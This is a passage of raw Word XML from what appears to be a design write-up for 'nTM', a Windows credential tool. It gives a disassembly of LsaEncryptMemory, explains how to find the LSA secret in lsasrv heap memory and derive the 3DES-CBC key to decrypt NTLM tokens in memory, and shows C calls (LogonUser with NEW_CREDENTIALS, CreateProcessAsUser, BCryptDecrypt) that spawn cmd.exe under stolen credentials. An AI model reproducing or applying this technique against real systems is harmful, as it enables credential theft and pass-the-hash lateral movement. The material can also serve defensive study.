      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">)(unsigned </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> *, // Pointer to buffer</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00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">nsigned </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>// Size of buffer</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 xml:space="preserve">unsigned </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>// Mode. 1=encrypt, 0=decrypt</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 NULL;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003857E8" w:rsidRDefault="003857E8" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>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.text:7573FDEC 000 8B FF                   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>mov</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edi</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edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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.text:7573FDEE 000 55                      push    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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.text:7573FDEF 004 8B EC                   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>mov</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ebp</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esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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.text:7573FDF1 004 81 EC 10 01 00 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>00</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">       sub     </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, 110h</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.text:7573FDF7 114 A1 58 01 7D 75          </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>mov</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eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, ___</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>security_cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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.text:7573FDFC 114 56                      push    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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.text:7573FDFD 118 8B 75 08                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>mov</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esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, [ebp+arg_0]</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.text:7573FE00 118 85 F6                   test    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 xml:space="preserve">.text:7573FE02 118 89 45 FC                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>mov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     [ebp+var_4]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003857E8" w:rsidRDefault="003857E8" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003857E8" w:rsidRDefault="003857E8" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003857E8" w:rsidRDefault="003857E8" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">In XP, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LsaEncryptMemory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> function is identified in memory through the function</w:t>
      </w:r>
      <w:r w:rsidR="00A46F32">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">prologue. Utilizing this function allows </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to decrypt/encrypt any token in memory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46F32" w:rsidRDefault="00A46F32" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003857E8" w:rsidRDefault="003857E8" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>NT6.0+ is much to the same effect, except for varying offsets in the tokens. The</w:t>
      </w:r>
      <w:r w:rsidR="00A46F32">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> library is instead used by LSA to perform encryption on tokens. All tokens in</w:t>
      </w:r>
      <w:r w:rsidR="00A46F32">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">LSA are encrypted using the same key, generated using the same secret. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> finds the secret in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lsasrv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> heap memory and generates a symmetric DESX-CBC key from it. The keys</w:t>
      </w:r>
      <w:r w:rsidR="00A46F32">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>are then used to perform encryption on the tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003857E8" w:rsidRDefault="003857E8" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003857E8" w:rsidRDefault="003857E8" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Furthermore, Windows XP uses the Advapi32.dll exports </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LogonUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(...) and </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003857E8" w:rsidRDefault="003857E8" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CreateProcessAsUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(...) to create the husk process. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003857E8" w:rsidRDefault="003857E8" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003857E8" w:rsidRPr="00A46F32" w:rsidRDefault="003857E8" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>LogonUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>real_token.user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>real_token.domain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</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PLAINTEXT_PASS,</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LOGON32_LOGON_NEW_CREDENTIALS,</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LOGON32_PROVIDER_DEFAULT,</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&amp;token);</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p>
    <w:p w:rsidR="003857E8" w:rsidRPr="00A46F32" w:rsidRDefault="003857E8" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CreateProcessAsUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>token,</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NULL,</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lastRenderedPageBreak/>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L"C:\\WINDOWS\\system32\\cmd.exe",</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NULL,</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NULL,</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FALSE,</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CREATE_SUSPENDED,</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NULL,</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NULL,</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&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>startup_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003857E8" w:rsidRPr="00A46F32" w:rsidRDefault="003857E8" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pP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r>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>process_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A46F32">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003857E8" w:rsidRDefault="003857E8" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003857E8" w:rsidRDefault="003857E8" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> running on Vista+ calls </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CreateProcessWithLogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(...), which is a more flexible</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003857E8" w:rsidRDefault="003857E8" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>function but does the same thing.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006F0736" w:rsidRDefault="006F0736" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006F0736" w:rsidRDefault="006F0736" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006F0736" w:rsidRDefault="006F0736" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006F0736" w:rsidRDefault="006F0736" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc347394087"/>
      <w:r>
        <w:t>NT6.0 Token Encryption</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="006F0736" w:rsidRDefault="006F0736" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006F0736" w:rsidRDefault="006F0736" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Once </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> has obtained the secret, it must generate a symmetric key and decrypt the token. BCRYPT_3DES_ALGORITHM is specified in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BCryptOpenAlgorithmProvider</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(...). The chaining mode, in this case CBC (BCRYPT_CHAIN_MODE_CBC) is applied by calling </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BCryptSetProperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(...). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F0736" w:rsidRDefault="006F0736" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006F0736" w:rsidRDefault="006F0736" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Next, a call to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BCryptGenerateSymmetricKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(...) returns the handle to the key object. The Initialization Vector is an 8 byte cryptographic primitive, which increases the entropy of the block cipher. Windows zero's this value before </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>callingBCryptDecrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(...).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F0736" w:rsidRDefault="006F0736" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006F0736" w:rsidRDefault="006F0736" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006F0736" w:rsidRPr="006F0736" w:rsidRDefault="006F0736" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F0736">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BCryptDecrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F0736">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="006F0736">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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F0736">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>key_handle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F0736">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</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(PUCHAR)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F0736">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>local_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F0736">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F0736">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>raw_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F0736">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</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NTLM_TOKEN_6_SIZE,</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NULL,</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iv,</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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F0736">
        <w:rPr>
